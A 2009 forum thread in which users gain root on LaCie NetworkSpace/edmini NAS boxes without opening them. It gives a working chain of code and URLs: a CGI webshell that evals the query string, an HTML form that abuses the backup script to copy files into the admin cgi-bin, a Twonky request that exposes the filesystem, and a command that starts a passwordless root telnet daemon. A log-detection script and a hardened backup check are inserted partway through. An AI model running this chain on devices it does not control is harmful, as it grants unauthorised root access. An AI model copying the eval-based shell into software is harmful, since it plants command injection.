Add SSH without disassembling

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Add SSH without disassembling

Post by belese » Tue May 19, 2009 1:02 am

Hi,

I found a way to add a webshell without disassembling.

It supposes you have access to the admin of TwonkyMedia

http://lacie.nas-central.org/wiki/Netwo ... diaServers

First you have to create a file Webshell and copy it to a folder on a USB key

Code:

#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING

Plug the USB key into the NAS.

I can't upload files, so copy this code into an HTML page:

Code:

<html>
<head>
	<title>Backup</title>
	<script language='Javascript'>
	function submitForm()
	{
		document.edit_form.action = 'http://' + document.getElementById('ipnas').value + '/cgi-bin/admin/backup';
		document.edit_form.submit();
	}
	</script>
</head>
<body>

<form name='edit_form' method='post' >

NAS IP address or name
<br>
<input type='text' name='ipnas' id='ipnas' value='NetworkSpace' size='60'>
<br>

Source (Path to folder and not file on usbkey)
(No / at the end)
<br>
<input type='text'  name='select2' id='select2'  value='/home/usbdisksdb1/webshell' size='60'>
<br>

Destination (Normally, don't modify)
(No / at the end)
<br>
<input type='text' name='select1' id='select1' value='/www/cgi-bin/admin' size='60'>
<br>

<input type='hidden' id='update' name='update' value='true'>

<br>
<a href='javascript:submitForm();'>Copy</a>

</form>

</body>
</html>


Open it, fill in the correct values and click Copy.

It will display an error but still copy the file; however, it creates a directory with a timestamp.

So, to find out the name of the directory:

http://your ip:9000/rpc/set_option?contentbase=/

Now go to the config page of Twonky Media (http://your ip:9000/config) and look for a directory; you now have access to all directories.
Go to "/www/cgi-bin/admin/".
The directory with the timestamp is there.

Copy it and paste it into:
http://your ip/cgi-bin/admin/your directory/webshell?

The webshell is now working.

Afterwards you can follow the procedure here:

http://jebimony.com/blog/content/add-ss ... -edmini-v2
Last edited by belese on Thu May 21, 2009 5:01 pm, edited 3 times in total.

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: Add SSH without disassembling

Post by Daan » Tue May 19, 2009 6:51 pm

Wow...

That's great! :D

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: Add SSH without disassembling

Post by Daan » Tue May 19, 2009 7:35 pm

Hmmm. I'm trying to apply your hack, but I have a hard time modifying backup.html. You have single quotation marks (') where I have double ("), and in your third line they do not match. Your last line I cannot find at all.

Do you mind posting your entire modified backup.html?

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: Add SSH without disassembling

Post by belese » Tue May 19, 2009 11:18 pm

I cleaned up the code and put it in my first post, so I removed this post.

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: Add SSH without disassembling

Post by Daan » Mon May 25, 2009 9:18 pm

Thank you for the nice HTML file. :) I have tried it and it works.
I already had access because I have opened the NAS before, but now I have an additional webshell.

It is actually surprisingly simple if I understand it correctly. From a desktop PC, your HTML file issues commands available on the NAS coded in scripts in /www/cgi-bin/admin and in /usr/bin/edmini.sh to copy files from a USB disk or stick to any location on the NAS. These commands are meant to make backups, but they let you copy any file, anywhere, with executable rights, and we use it to put the webshell backdoor in place. You don't need Twonky to do that. You can exploit Twonky to find out the exact name of the directory, which is difficult to guess because it is the name of the original directory with a many-digit time stamp added. Therefore we set the top directory of Twonky to the root directory of the NAS (/) with your nifty command

Code:

http://networkspace:9000/rpc/set_option?contentbase=/

Then we can use Twonky's web config page to get a directory listing of /www/cgi-bin/admin and see the name of the "backed up" directory. In my case, I could access the webshell by 'going to'

Code:

http://networkspace/cgi-bin/admin/webshell-2009052522051243283626/webshell?whoami

in a web browser. The answer I got to the whoami was

"root"

:-)

Anyone else got it working?
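
The two request patterns described in the post above (the media server's content base set to "/", and a request served from a timestamp-suffixed directory under /cgi-bin/admin) can be searched for in web access logs. This is an added example, not part of any post in this thread; the common-log-format layout, the rule names and the "14 or more digits" threshold are assumptions, and the log lines are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): flag the two request patterns the
# posts above describe. Assumes common-log-format lines on stdin.

# Constructed sample log; addresses are documentation IPs.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [25/May/2009:22:04:11 +0200] "GET /rpc/set_option?contentbase=/ HTTP/1.1" 200 2
192.0.2.10 - - [25/May/2009:22:05:40 +0200] "GET /cgi-bin/admin/webshell-2009052522051243283626/webshell?whoami HTTP/1.1" 200 5
192.0.2.22 - - [25/May/2009:22:06:02 +0200] "POST /cgi-bin/admin/backup HTTP/1.1" 200 4312
192.0.2.22 - - [25/May/2009:22:07:15 +0200] "GET /rpc/set_option?contentbase=/home/openshare/media HTTP/1.1" 200 2
EOF
}

# True if request path $1 matches extended regex $2.
req_matches() {
    printf '%s\n' "$1" | grep -Eq -- "$2"
}

# Print "<rule> <client> <path>" for each suspicious request on stdin.
flag_requests() {
    while IFS= read -r line; do
        client=${line%% *}
        # Pull the request target out of the quoted "METHOD target PROTO" field.
        req=$(printf '%s\n' "$line" | sed -n 's/^[^"]*"[A-Z]* \([^ "]*\).*/\1/p')
        [ -n "$req" ] || continue
        # Rule 1: media server content base moved to the filesystem root.
        if req_matches "$req" '^/rpc/set_option\?(.*&)?contentbase=(/|%2[Ff])(&|$)'; then
            echo "contentbase-root $client $req"
        # Rule 2: anything served from a "<name>-<long digit run>" directory
        # under the admin CGI path, i.e. a backup copy that landed in cgi-bin.
        elif req_matches "$req" '^/cgi-bin/admin/[^/?]+-[0-9]{14,}/'; then
            echo "cgi-from-backup-copy $client $req"
        fi
    done
}

sample_log | flag_requests
```

The plain call to the backup CGI and the content base pointing at a media folder are left unflagged; the POST body that carries the destination path does not appear in this log format.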

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: Add SSH without disassembling

Post by belese » Tue May 26, 2009 10:20 pm

Hi

Thanks for translating my explanation into "real" English!!! 8-)
I'm sorry for my English, but I'm a native French speaker.

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: Add SSH without disassembling

Post by Daan » Tue May 26, 2009 10:42 pm

belese wrote: Thanks for translating my explanation into "real" English!!! 8-)
Thank you for the hack! Let's include it in the wiki. But first some more people that have used it successfully. For instance: does the original webshell file that is "backed up" need to have permissions set to executable? Does it need to come from an ext3-like file system?

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: Add SSH without disassembling

Post by belese » Tue May 26, 2009 10:45 pm

I think that when it copies, it keeps the same rights, but I have not really tested it.
I also think that you don't need a USB key and can copy directly from /home/openshare, but again, I haven't tested it.
And for ext3, no: I've done everything from Windows with a USB key in NTFS (but be sure your webshell is in UNIX format!!). I lost more than 2 hours because my webshell was in Windows text mode.

theike
Posts: 27
Joined: Sun Mar 08, 2009 10:19 pm

Re: Add SSH without disassembling

Post by theike » Wed May 27, 2009 9:47 am

Hi,

Great find (Why didn't I come up with it myself :D )

I confirm it works and you don't need the USB stick. Just copy the file (using samba/windows share) to your openshare (create a new folder, as everything in this folder will be copied to the admin page, and you just want the backdoor there).

For instance: create a folder 'hack' and name the injection script 'backdoor' (the small script, not the html).

Now open your HTML page and edit the source path to '/home/openshare/hack' and that should be it.
You get an error that there is no USB device connected (so what :) ) and you need to find the timestamped folder (use Twonky).

To make the hack complete:
Copy the telnet daemon (utelnetd) to your openshare and call the following page:
http://networkspace/cgi-bin/admin/hack- ... e/utelnetd -l /bin/bash

This will start telnet without password check. Password check is not (yet) possible as root has no password assigned. You will be authenticated as root.

You're done :)

Kind regards,
Theike

jhench
Posts: 6
Joined: Tue Mar 18, 2008 2:35 pm

GREAT!

Post by jhench » Sun Jun 07, 2009 10:00 am

Congratulations, this is really neat. THANK YOU!

I was less patient with my first edmini V2 more than 2 years ago and grabbed the screwdriver :twisted: very quickly. Yet, I was always hoping someone would come up with an idea!

I wonder if the hack can be applied to the 2big as well. Here, the RAID1 is kind of an obstacle when trying to access and modify the HD content with another computer. If that worked here as well (assuming similar applications and shell scripts on the 2big), the 2big might be modified while running in RAID 1. And that would mean: No problem with synchronizing two drives and no messing around with mounting them as RAID 1. As soon as I get hold of a 2big I will try it.

Ferretz
Posts: 3
Joined: Wed Jun 24, 2009 3:18 am

Re: Add SSH without disassembling

Post by Ferretz » Fri Jun 26, 2009 11:18 am

Hi

Well, I am either doing something wrong, or LaCie have changed some of their scripts. (This is a bit moot, as I have already gained access to the box using earlier techniques, but some folks may strike the same problem.)

Also, my device is very new, but I am not sure how to check firmware versions etc.

Anyways...

I have created the directories and scripts as directed above, but when I load the webpage and press the button, the following error message appears briefly before the backup webpage then loads.

"df: /www/cgi-bin/admin: can't find mount point. /www/cgi-bin/admin/backup: line 131: [: -lt: unary operator expected"

Some lines of the backup script, i.e. /www/cgi-bin/admin/backup, are shown below; line 131 is in red.
I think the real culprit is line 121, in blue, as it appears to be checking that /home is in the destination path. If /home is not in the destination path, the script bombs out and prevents this hack working!?

Is anyone else getting the same problem?

SRC_SIZE=`du -s $BACKUP_SRC | awk '{print $1}'`
DEST_SIZE=`df $BACKUP_DEST | grep /home | awk '{print $4}'`

if [ $ERR_CODE -eq 0 ] && [ -z "$BACKUP_DEST" ] || [ -z "$BACKUP_SRC" ]
then
# ---
# --- Something missing
# ---
ERR_CODE=2
fi

if [ $ERR_CODE -eq 0 ] && [ ${DEST_SIZE} -lt ${SRC_SIZE} ]
then
# ---
# --- no enough space in destination
# ---
ERR_CODE=3
fi

if [ $ERR_CODE -eq 0 ]
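
In the excerpt quoted above, an empty DEST_SIZE makes the unquoted `[ ${DEST_SIZE} -lt ${SRC_SIZE} ]` test exit with an error, so the branch that sets ERR_CODE=3 is skipped and ERR_CODE stays 0. The following added example, which is not the device's script and not code from any poster, reproduces that test next to a fail-closed version that also canonicalises the destination before comparing it with an allowed root. ALLOWED_ROOT and all function names are assumptions.

```shell
#!/bin/sh
# Added example (not the device's script): fail-closed checks for a backup
# CGI. ALLOWED_ROOT and all function names are assumptions.
ALLOWED_ROOT=${ALLOWED_ROOT:-/home}

# The quoted size test, reproduced: with an empty DEST_SIZE `[` errors out,
# the branch is skipped and ERR_CODE stays 0, so the copy goes ahead.
legacy_size_check() {
    ERR_CODE=0
    if [ $ERR_CODE -eq 0 ] && [ $1 -lt $2 ] 2>/dev/null; then ERR_CODE=3; fi
    echo "$ERR_CODE"
}

# Physical path of directory $1 (symlinks and ".." resolved); fails if absent.
canon_dir() { ( cd -- "$1" 2>/dev/null && pwd -P ); }

# True only if directory $1 is at or below directory $2.
is_under() {
    dir=$(canon_dir "$1") && root=$(canon_dir "$2") || return 1
    case "$dir/" in "$root"/*) return 0 ;; *) return 1 ;; esac
}

# True only for a non-empty string of digits.
is_uint() { case "$1" in ''|*[!0-9]*) return 1 ;; *) return 0 ;; esac; }

# 0 = copy may proceed; 2 = missing or disallowed path; 3 = size unknown
# or not enough space. Anything that cannot be verified is a refusal.
validate_backup() {
    src=$1; dest=$2
    [ -n "$src" ] && [ -n "$dest" ] && [ -d "$src" ] || return 2
    is_under "$dest" "$ALLOWED_ROOT" || return 2
    src_kb=$(du -sk -- "$src" | awk '{print $1}')
    dest_kb=$(df -Pk -- "$dest" | awk 'NR==2 {print $4}')
    is_uint "$src_kb" && is_uint "$dest_kb" || return 3
    [ "$dest_kb" -ge "$src_kb" ] || return 3
}

if [ "$#" -eq 2 ]; then
    validate_backup "$1" "$2"; echo "ERR_CODE=$?"
fi
```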

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: Add SSH without disassembling

Post by Daan » Fri Jun 26, 2009 5:47 pm

You can see the firmware version by surfing to the Configuration web page and then clicking "Support".

Mine is version 1.1.6.

Ferretz
Posts: 3
Joined: Wed Jun 24, 2009 3:18 am

Re: Add SSH without disassembling

Post by Ferretz » Mon Jun 29, 2009 11:20 am

And mine, with a possibly new set of (not so hackable) backup scripts, is version 1.1.8.

Has anyone else with version 1.1.8 had any success in using the approach as defined in this thread?

Ack.

theike
Posts: 27
Joined: Sun Mar 08, 2009 10:19 pm

Re: Add SSH without disassembling

Post by theike » Tue Jun 30, 2009 7:51 pm

Any chance of providing us with a copy of the .8-scripts?

Kind regards,
Theike

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: Add SSH without disassembling

Post by belese » Tue Jun 30, 2009 11:20 pm

Hi,

I've got the same error, but it copies the file anyway (for me, but I also have 1.1.6).
